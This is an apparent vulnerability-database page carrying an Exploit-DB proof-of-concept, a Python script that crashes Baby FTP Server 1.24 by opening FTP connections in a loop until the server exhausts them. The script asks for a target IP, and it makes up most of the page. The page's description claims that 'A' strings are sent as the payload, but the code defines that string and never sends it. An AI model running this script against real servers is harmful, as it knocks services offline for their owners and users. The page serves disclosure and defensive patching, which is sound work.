Baby FTP 1.24 - Denial of Service by n30m1nd

vendor:

Baby FTP Server

by:

n30m1nd

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Baby FTP Server

Affected Version From: 1.24

Affected Version To: 1.24

Patch Exists: Yes

Related CWE: N/A

CPE: a:pablosoftwaresolutions:baby_ftp_server:1.24

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 and Windows 10

2016

Baby FTP 1.24 – Denial of Service by n30m1nd

The FTP Server can't handle more than ~1505 connections at the same time. The exploit code creates a socket connection to the target IP and sends a USER and PASS command with a large string of 'A's as the payload. This causes the server to crash.

Mitigation:

Upgrade to the latest version of Baby FTP Server.

Source

Exploit-DB raw data:

#!/usr/bin/python

### Baby FTP 1.24 - Denial of Service by n30m1nd ### 

# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.pablosoftwaresolutions.com/
# Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
# Version: 1.24
# Tested on: Win7 64bit and Win10 64 bit

# Credits
# =======
# Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better

# How to
# ======
# * Run this python script and write the IP to attack.

# Why?
# ====
# The FTP Server can't handle more than ~1505 connections at the same time

# Exploit code
# ============

import socket

ip = raw_input("[+] IP to attack: ")

sarr = []
i = 0
while True:
	try:
		sarr.append(socket.create_connection((ip,21)))
		print "[+] Connection %d" % i
		crash1 = "A"*500

		sarr[i].send("USER anonymous\r\n" )
		sarr[i].recv(4096)

		sarr[i].send("PASS n30m1nd\r\n" )
		sarr[i].recv(4096)
		i+=1
	except socket.error:
		print "[*] Server crashed!!"
        raw_input()
		break